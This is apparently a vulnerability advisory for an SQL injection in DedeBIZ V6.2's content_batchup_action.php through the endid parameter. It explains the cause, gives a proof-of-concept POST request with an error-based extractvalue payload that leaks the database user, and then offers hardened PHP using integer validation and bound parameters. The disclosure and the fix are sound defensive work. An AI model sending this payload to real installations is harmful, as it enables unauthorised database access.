[Suggested description]
A SQL injection vulnerability exists in DedeBIZ V6.2 in /src/admin/content_batchup_action.php
[Vulnerability Type]
SQL INJECTION
[Vendor of Product]
https://github.com/DedeBIZ/DedeV6
[Affected Product Code Base]
DedeBIZ V6.2
[Affected Component]
File: /src/admin/content_batchup_action.php
Parameter: endid
[Attack Type]
Remote
[Cause of vulnerability]
In /src/admin/content_batchup_action.php there is a possibility of SQL injection in the SQL statement ‘$dsql->SetQuery("SELECT id FROM #@__archives $gwhere");’
In this code, $gwhere is controlled by $endid through the statement below:
if ($endid > $startid) $gwhere .= " AND id<= $endid ";
For $endid, only single quotes are removed by the global filter, with no other protection. $endid is concatenated directly into $gwhere, and $gwhere is concatenated directly into SQL statements such as:
$dsql->SetQuery("SELECT id,arcrank FROM #@__arctiny $gwhere");
What is more, the PHP file can be accessed directly; it reads its parameters from POST request data, so $endid can be controlled by an attacker via the POST body.
Therefore, the SQL injection exists.
[Vulnerability demonstration]
Request URL
http://localhost:8086/admin/content_batchup_action.php
POST data
dopost=go&typeid=1&startid=1&userid=1&action=check&&endid=extractvalue(1,concat(0x7e,(select user()),0x7e))
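As an added example (not DedeBIZ code), this is a hardened way to build the same id-range clause: the id fields are validated as integers before use and passed to the query as bound parameters, so a value like the endid above is rejected rather than interpolated. The function names, the $post array, the PDO connection and the table name dede_archives are assumptions.

```php
<?php
// Added example, not code from DedeBIZ. Function names, the $post array,
// the PDO connection and the table name below are assumptions.
// Accept an id only if it is a non-negative integer or a plain string of digits.
// The advisory's endid value is neither, so it is rejected here instead of
// reaching the query (the project's single-quote filter leaves it untouched,
// because it contains no single quote).
function validateId($raw): ?int
{
    if (is_int($raw)) {
        return $raw >= 0 ? $raw : null;
    }
    if (is_string($raw) && $raw !== '' && ctype_digit($raw) && strlen($raw) <= 10) {
        return (int) $raw;
    }
    return null;
}

// Build the id-range clause with placeholders instead of interpolating $endid.
// Returns null when either bound is not a valid id.
function buildRangeWhere(array $post): ?array
{
    $startid = validateId($post['startid'] ?? null);
    $endid   = validateId($post['endid'] ?? null);
    if ($startid === null || $endid === null) {
        return null;
    }
    $where  = ' AND id >= ?';
    $params = [$startid];
    if ($endid > $startid) {            // same condition as the original code
        $where   .= ' AND id <= ?';
        $params[] = $endid;
    }
    return [$where, $params];
}
// Assumed PDO connection; dede_archives stands in for the #@__archives table.
function selectArchiveIds(PDO $db, array $post): array
{
    $built = buildRangeWhere($post);
    if ($built === null) {
        throw new InvalidArgumentException('startid/endid must be non-negative integers');
    }
    [$where, $params] = $built;
    $stmt = $db->prepare("SELECT id FROM dede_archives WHERE 1=1$where");
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}
// The endid value from the proof of concept is rejected; a plain numeric range is accepted.
var_dump(validateId('extractvalue(1,concat(0x7e,(select user()),0x7e))'));
var_dump(buildRangeWhere(['startid' => '1', 'endid' => '20']));
```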